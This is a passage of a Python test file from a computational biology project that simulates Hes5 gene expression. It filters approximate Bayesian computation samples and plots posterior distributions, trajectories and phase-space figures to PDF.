if parameter_index in [0, 3]:
plt.ylabel("Power")
if parameter_index == 0:
plt.text(0.03, 0.6, 'Allele 1',
fontsize = 7,
color = 'green',
transform=plt.gca().transAxes)
allele_2_power_spectrum_axis = plt.Subplot(my_figure, this_power_spectrum_grid[2])
my_figure.add_subplot(allele_2_power_spectrum_axis)
allele_2_power_spectrum_axis.plot(this_allele_2_power_spectrum[:,0],
this_allele_2_power_spectrum[:,1],
color = 'blue')
plt.xlim(0,0.01)
allele_2_power_spectrum_axis.locator_params(axis='x', tight = True, nbins=3)
allele_2_power_spectrum_axis.locator_params(axis='y', tight = True, nbins=3)
plt.gca().yaxis.set_ticklabels([])
plt.xlabel("Frequency [1/min]")
if parameter_index == 0:
plt.text(0.03, 0.6, 'Allele 2',
fontsize = 7,
color = 'blue',
transform=plt.gca().transAxes)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),'output','heterozygous_visualisation.pdf'))
def xest_plot_ngn(self):
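# Summary: read Hes5 and Ngn2 staining intensities from an excel sheet and
# scatter-plot them against each other.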
excel_path = os.path.join(os.path.dirname(__file__),'data','Ngn2Staining_VS_VH5intensity_E10_5.xlsx')
complete_excel_file = xlrd.open_workbook(excel_path)
excel_sheet = complete_excel_file.sheet_by_index(3)
hes5_column_values = excel_sheet.col_values(8)
ngn2_column_values = excel_sheet.col_values(9)
hes5_values = hes5_column_values[4:]
ngn2_values = ngn2_column_values[4:]
sns.set()
font = {'size' : 28}
plt.rc('font', **font)
plt.figure( figsize = (5,3) )
# plt.scatter(hes5_values, ngn2_values, color = 'grey', lw = 0)
sns.regplot(x=np.array(hes5_values), y=np.array(ngn2_values), fit_reg=False)
plt.xlabel('Hes5 (a. u.)')
plt.ylabel('Ngn2 (a. u.)')
plt.xlim(0,)
plt.ylim(0,)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),'output','ngn_visualisation.pdf'))
def xest_plot_distributions_for_poster(self):
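# Summary: plot marginal posterior distributions of all five model
# parameters, histogramming transcription and translation rates on a log10
# scale.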
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_samples[:,2]/=10000
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,2,20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,2)
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.gca().tick_params(axis='y', labelsize = 'small')
plt.gca().set_ylim(0,0.8)
plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,2.3,20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,2.3)
plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1,2], [r'$10^0$',r'$10^1$',r'$10^2$'])
plt.xlabel("Translation rate \n [1/min]")
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
rug = False)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
bins = time_delay_bins)
plt.gca().set_xlim(0,45)
plt.gca().set_ylim(0,0.035)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel("Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
rug = False)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(1,7)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','inference_for_poster.pdf'))
def test_plot_prior_for_poster(self):
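# Summary: same panels as the posterior poster figure above, but
# histogramming the full prior sample instead.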
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_samples[:,2]/=10000
prior_samples[:,2]/=10000
data_frame = pd.DataFrame( data = prior_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,2,20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,2)
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.gca().tick_params(axis='y', labelsize = 'small')
plt.gca().set_ylim(0,0.8)
plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,2.3,20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,2.3)
plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1,2], [r'$10^0$',r'$10^1$',r'$10^2$'])
plt.xlabel("Translation rate \n [1/min]")
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
rug = False)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
bins = time_delay_bins)
plt.gca().set_xlim(0,45)
plt.gca().set_ylim(0,0.035)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel("Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
rug = False)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(1,7)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','prior_for_poster.pdf'))
def xest_make_agnostic_abc_samples(self):
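# Summary: draw 200000 prior samples for the 'agnostic' model, which adds a
# noise_strength parameter to the usual five, and build the corresponding
# ABC lookup tables.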
## generate posterior samples
total_number_of_samples = 200000
prior_bounds = {'basal_transcription_rate' : (0.1,60),
'translation_rate' : (1,40),
'repression_threshold' : (0,120000),
'time_delay' : (5,40),
'hill_coefficient' : (2,6),
'noise_strength' : (0,20)}
my_prior_samples, my_results = hes5.generate_lookup_tables_for_abc( total_number_of_samples,
number_of_traces_per_sample = 200,
saving_name = 'sampling_results_agnostic',
prior_bounds = prior_bounds,
model = 'agnostic',
logarithmic = True,
simulation_timestep = 1.0,
simulation_duration = 1500*5 )
self.assertEqual(my_prior_samples.shape,
(total_number_of_samples, 6))
def xest_plot_phase_space(self):
# phase space: we have two options: mRNA vs protein, or
# protein vs dprotein/dt (or mRNA vs dmRNA/dt)
# we start with protein vs mRNA
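# Summary: compare a deterministic and a langevin trajectory for one
# high-coherence parameter point, both over time and in the (mRNA, protein)
# phase plane.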
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
# same plot as before for different transcription ("more_mrna") - not yet
# our preferred hes5 values
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.8)))))
my_posterior_samples = prior_samples[accepted_indices]
this_parameter = my_posterior_samples[0]
my_trajectory = hes5.generate_deterministic_trajectory( duration = 1000 + 5*1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
hill_coefficient = this_parameter[4],
transcription_delay = this_parameter[3],
initial_mRNA = 3,
initial_protein = this_parameter[2])
# my_stochastic_trajectory = hes5.generate_langevin_trajectory( duration = 1000 + 5*1500,
my_stochastic_trajectory = hes5.generate_langevin_trajectory( duration = 1000+ 5*1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
hill_coefficient = this_parameter[4],
transcription_delay = this_parameter[3],
initial_mRNA = 3,
initial_protein = this_parameter[2],
equilibration_time = 0)
# equilibration_time = 1000.0)
# my_trajectory = my_trajectory[my_trajectory[:,0]>1000]
# my_trajectory[:,0] -= 1000
figuresize = (4,5)
my_figure = plt.figure(figsize = figuresize)
my_figure.add_subplot(311)
plt.plot(my_trajectory[:,0],my_trajectory[:,2], color = 'black', alpha = 0.3)
plt.xlabel('Time')
plt.ylabel('det. Protein')
my_figure.add_subplot(312)
plt.plot(my_stochastic_trajectory[:,0],my_stochastic_trajectory[:,2], color = 'black', alpha = 0.3)
plt.xlabel('Time')
plt.ylabel('stoch. Protein')
my_figure.add_subplot(313)
plt.plot(my_trajectory[:-1,1],my_trajectory[:-1,2], color = 'black', alpha = 0.3, label = 'deterministic')
plt.plot(my_stochastic_trajectory[:,1],my_stochastic_trajectory[:,2], color = 'blue', alpha = 0.3, label = 'stochastic')
plt.xlabel('mRNA')
plt.ylabel('Protein')
plt.legend()
plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hes5_phase_space_analysis.pdf'))
def xest_obtain_maximum_likelihood_estimate(self):
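"""Estimate the posterior mode by fitting a Gaussian KDE to the
accepted samples (with log10-transformed transcription and
translation rates) and minimising the negative density."""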
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_samples[:,0] = np.log10(my_posterior_samples[:,0])
my_posterior_samples[:,1] = np.log10(my_posterior_samples[:,1])
kernel_density_function = scipy.stats.gaussian_kde(my_posterior_samples.transpose())
minimizing_function = lambda x: -1*kernel_density_function(x)
print('likelihood at typical value is')
print(kernel_density_function([0,1.3,45000,30,4]))
#
# optimize_result = scipy.optimize.minimize(minimizing_function,
# x0 = [0,1.3,45000,30,4],
# bounds = [(-1, np.log10(60)),
# (0, np.log10(40)),
# (0,120000),
# (5,40),
# (2,6)],
# tol = 1e-14,
# options = {'disp': True})
#
# maximum_likelihood_estimate = optimize_result.x
maximum_likelihood_estimate = scipy.optimize.fmin(minimizing_function,
x0 = [0,1.3,45000,30,4])
maximum_likelihood_estimate[0] = np.power(10, maximum_likelihood_estimate[0])
maximum_likelihood_estimate[1] = np.power(10, maximum_likelihood_estimate[1])
print('maximum_likelihood_estimate is')
print(maximum_likelihood_estimate)
def test_plot_deterministic_posterior_distributions_with_KDE(self):
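"""Plot marginal posterior histograms for the five model parameters.

The 'option' string selects the acceptance criteria. The column
meanings of model_results (mean protein, COV, period, coherence)
are inferred from their usage below. Each nested np.logical_and
chain is equivalent to a single boolean reduction, e.g.

    condition = ((model_results[:,0] > 55000) &
                 (model_results[:,0] < 65000) &
                 (model_results[:,1] > 0.05))
    accepted_indices = np.where(condition)
"""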
option = 'oscillating'
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
if option == 'full':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
elif option == 'oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.3))))) #coherence
elif option == 'not_oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]<0.1))))) #coherence
elif option == 'deterministic':
accepted_indices = np.where(np.logical_and(model_results[:,5]>55000, #protein number
np.logical_and(model_results[:,5]<65000, #protein_number
# np.logical_and(model_results[:,6]<0.15, #standard deviation
# model_results[:,6]>0.05))))
model_results[:,6]>0.05)))
else:
raise ValueError('could not identify posterior option')
#
my_posterior_samples = prior_samples[accepted_indices]
# pairplot = hes5.plot_posterior_distributions( my_posterior_samples )
# pairplot.savefig(os.path.join(os.path.dirname(__file__),
# 'output','pairplot_extended_abc_' + option + '.pdf'))
print('Number of accepted samples is ')
print(len(my_posterior_samples))
my_posterior_samples[:,2]/=10000
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
print('minimum time delay is')
print(np.min(data_frame['Transcription delay']))
print('minimum hill coefficient is')
print(np.min(data_frame['Hill coefficient']))
nbins=20
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,np.log10(60.0),nbins)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,np.log10(60.0))
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.gca().set_ylim(0,2.0)
plt.xticks([-1,0,1], [r'$10^{-1}$',r'$10^0$',r'$10^1$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,np.log10(40),nbins)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,np.log10(40))
# plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1], [r'$10^0$',r'$10^1$'])
plt.xlabel("Translation rate \n [1/min]")
# plt.gca().set_ylim(0,4.0)
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = nbins)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
# plt.gca().set_ylim(0,0.22)
plt.gca().set_xlim(0,12)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
# time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = nbins)
# bins = time_delay_bins)
plt.gca().set_xlim(5,40)
# plt.gca().set_ylim(0,0.035)
# plt.gca().set_ylim(0,0.08)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel(" Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = nbins)
# plt.gca().set_xlim(1,200)
# plt.gca().set_ylim(0,0.7)
plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
# plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','kde_inference_for_paper_' + option + '.pdf'))
def xest_plot_example_deterministic_trace(self):
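"""Plot one deterministic mRNA/protein trajectory for the first
accepted sample; columns 5 and 6 of model_results presumably hold
the deterministic mean and COV summary statistics."""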
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
# same plot as before for different transcription ("more_mrna") - not yet
# our preferred hes5 values
accepted_indices = np.where(np.logical_and(model_results[:,5]>55000, #protein number
np.logical_and(model_results[:,5]<65000, #protein_number
np.logical_and(model_results[:,6]<0.15, #standard deviation
model_results[:,6]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
this_parameter = my_posterior_samples[0]
my_trajectory = hes5.generate_deterministic_trajectory( duration = 1000 + 5*1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
hill_coefficient = this_parameter[4],
transcription_delay = this_parameter[3],
initial_mRNA = 3,
initial_protein = this_parameter[2])
my_trajectory = my_trajectory[my_trajectory[:,0]>1000]
my_trajectory[:,0] -= 1000
self.assertGreaterEqual(np.min(my_trajectory),0.0)
figuresize = (4,2.5)
my_figure = plt.figure(figsize = figuresize)
plt.plot(my_trajectory[:,0],
my_trajectory[:,1]*100, label = 'mRNA*100', color = 'black')
plt.plot(my_trajectory[:,0],
my_trajectory[:,2], label = 'Hes protein', color = 'black', ls = '--')
plt.xlabel('Time')
plt.ylabel('Copy number')
plt.legend()
plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hes5_deterministic_oscillating_trajectory.pdf'))
def xest_plot_agnostic_oscillating_variation(self):
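"""Plot an oscillating example trajectory of the agnostic-noise model
(first accepted sample with coherence above 0.3)."""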
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.3))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
this_parameter = my_posterior_samples[0,:]
# same plot as before for different transcription ("more_mrna") - not yet
# our preferred hes5 values
my_trajectory = hes5.generate_agnostic_noise_trajectory( duration = 1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
transcription_delay = this_parameter[3],
hill_coefficient = this_parameter[4],
noise_strength = this_parameter[5],
initial_mRNA = 3,
initial_protein = this_parameter[2],
equilibration_time = 1000.0)
self.assertGreaterEqual(np.min(my_trajectory),0.0)
figuresize = (4,2.5)
my_figure = plt.figure(figsize = figuresize)
plt.plot(my_trajectory[:,0],
my_trajectory[:,1]*100, label = 'mRNA*100', color = 'black')
plt.plot(my_trajectory[:,0],
my_trajectory[:,2], label = 'Hes protein', color = 'black', ls = '--')
plt.xlabel('Time')
plt.ylabel('Copy number')
plt.legend()
plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hes5_agnostic_oscillating_trajectory.pdf'))
def xest_plot_agnostic_not_oscillating_variation(self):
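"""Plot a non-oscillating example trajectory of the agnostic-noise
model (first accepted sample with coherence below 0.05)."""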
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]<0.05))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
this_parameter = my_posterior_samples[0,:]
# same plot as before for different transcription ("more_mrna") - not yet
# our preferred hes5 values
my_trajectory = hes5.generate_agnostic_noise_trajectory( duration = 1500,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
transcription_delay = this_parameter[3],
hill_coefficient = this_parameter[4],
noise_strength = this_parameter[5],
initial_mRNA = 3,
initial_protein = this_parameter[2],
equilibration_time = 1000.0)
self.assertGreaterEqual(np.min(my_trajectory),0.0)
figuresize = (4,2.5)
my_figure = plt.figure(figsize = figuresize)
plt.plot(my_trajectory[:,0],
my_trajectory[:,1]*100, label = 'mRNA*100', color = 'black')
plt.plot(my_trajectory[:,0],
my_trajectory[:,2], label = 'Hes protein', color = 'black', ls = '--')
plt.xlabel('Time')
plt.ylabel('Copy number')
plt.legend()
plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','hes5_agnostic_not_oscillating_trajectory.pdf'))
def xest_plot_agnostic_posterior_distributions(self):
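"""Plot marginal posterior histograms, including the noise strength,
for the agnostic-noise model under the selected acceptance option."""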
option = 'full'
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
if option == 'full':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,-1]<20))))) #noise strength
elif option == 'oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.3))))) #coherence
elif option == 'not_oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]<0.1))))) #coherence
else:
raise ValueError('could not identify posterior option')
#
my_posterior_samples = prior_samples[accepted_indices]
print('Number of accepted samples is ')
print(len(my_posterior_samples))
pairplot = hes5.plot_posterior_distributions( my_posterior_samples )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_agnostic_abc_' + option + '.pdf'))
my_posterior_samples[:,2]/=10000
data_frame = pd.DataFrame( data = my_posterior_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient',
'Noise strength'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(161)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,np.log10(60.0),20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,np.log10(60.0))
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.gca().set_ylim(0,1.0)
plt.xticks([-1,0,1], [r'$10^{-1}$',r'$10^0$',r'$10^1$'])
# plt.yticks([])
my_figure.add_subplot(162)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,np.log10(40),20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,np.log10(40))
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1], [r'$10^0$',r'$10^1$'])
plt.xlabel("Translation rate \n [1/min]")
plt.gca().set_ylim(0,2.0)
# plt.yticks([])
my_figure.add_subplot(163)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().set_xlim(0,12)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(164))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = time_delay_bins)
plt.gca().set_xlim(5,40)
# plt.gca().set_ylim(0,0.035)
plt.gca().set_ylim(0,0.04)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel(" Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(165))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(166))
sns.distplot(data_frame['Noise strength'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
